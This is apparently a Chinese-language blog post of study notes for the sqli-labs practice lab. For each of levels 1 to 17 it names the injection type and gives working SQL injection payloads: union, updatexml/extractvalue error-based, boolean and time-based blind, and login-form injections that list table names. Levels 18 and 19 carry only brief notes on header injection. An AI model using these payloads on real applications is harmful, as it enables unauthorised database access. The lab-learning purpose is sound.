sqli解题思路

**

sqli-labs解题思路

**

小白开始重新学习sqli

  • 1关:

单引号,字符串,错误注入,联合注入
http://172.16.13.33/sqli/Less-1/?id=1’ and 1=1–+
接着进行联合注入

  • 2关:

整型,报错,联合注入
http://172.16.13.33/sqli/Less-2/?id=1 and 1=2 整型可以不用加注释
后进行联合注入

  • 3关


错误,单引号+括号,字符
http://172.16.13.33/sqli/Less-3/?id=1’) and 1=1–+
后进行联合查询套路

  • 4关


错误,双引号+括号,字符
http://172.16.13.33/sqli/Less-4/?id=1") and 1=1 --+
http://172.16.13.33/sqli/Less-4/?id=-1") union select 1,2,3–+
进行联合注入套路

  • 5关:

二次注入,单引号,字符,报错注入
http://172.16.13.33/sqli/Less-5/?id=1’ and updatexml(1,concat(0x7e,database(),0x7e),1) --+
因为除了错误没有其他回显所以可以用报错注入

  • 6关:

字符,双引号,二次注入
http://172.16.13.33/sqli/Less-6/?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1) --+
后用报错注入

  • 7关:

字符,文件

  • 8关:

单引号,布尔盲注
http://172.16.13.33/sqli/Less-8/?id=1’ and length(database())>7–+
http://172.16.13.33/sqli/Less-8/?id=1’ and substr(database(),1,1)=‘s’–+
进行布尔盲注

  • 9关:

单引号,时间盲注
http://172.16.13.33/sqli/Less-9/?id=1’ and if(substr(database(),1,1)=‘s’,sleep(4),1) --+
加burpsuite进行盲注

  • 10关:

双引号,时间盲注
http://172.16.13.33/sqli/Less-10/?id=1" and if(substr(database(),1,1)=‘s’,sleep(4),1) --+

  • 11关:

错误,字符,单引号
admin’ and 1=1#
admin’ order by 5 #
后面用套路进行联合注入

  • 12关:

错误,双引号+括号,字符
1" and 1=1 and 1"
前闭合,中间查询,后面报错,应该是这样没错了,实际测试没问题,可以回显,接下来就再concat()中构造查询语句:用错误查询
admin" and updatexml(1,concat(0x7e,database(),0x7e),1) and"
admin" and updatexml(1,concat(0x7e,length(database()),0x7e),1) and"

  • 13关:

二次注入,单引号,字符
admin’) and 1=1–+
admin’) and updatexml(1,concat(0x7e,database(),0x7e),1)#
admin’) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1)#
后面用经典错误注入

  • 14关:

二次注入,单引号,字符
admin" and 1=1#
admin" and updatexml(1,concat(0x7e,database(),0x7e),1)#
admin" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1)# #
后面用错误注入

1’ order by 6#
报错注入:1" and updatexml(1,concat(0x7e,database(),0x7e),1) #
时间盲注:
判断条件:1’ or sleep(5)#如果为时间盲注则延迟
admin’and if(substr(database(),1,1)=‘s’,sleep(5),1)#
admin’and if((substr((select database()),1,1)=‘s’),sleep(5),1)#

  • 15关:

盲注
admin’ and substr(database(),1,1)=‘s’#
用布尔盲注

  • 16关:

双引号+括号,时间/布尔盲注
admin") and 1=1#
admin") and length(database())>9#

  • 17关:

字符,错误注入,单引号
报错型注入,单引号,注释符可用
admin’) and 1=1#
admin" and 1=1#
admin’ and extractvalue(1,concat(0x7e,database(),0x7e),1)#
admin’ and updatexml(1,concat(0x7e,database(),0x7e),1)–+

最终版:
name输入:admin
password输入:admin’ and updatexml(1,concat(0x7e,database(),0x7e),1)#
且注释一定用#

  • 18关:

头部注入,错误
http头注入,当在User-Agent后面加上\时就会报错,是单引号闭合情况????、

  • 19关:

头注入,错误,文件
还没做完,后面慢慢补。

你可能感兴趣的:(学习)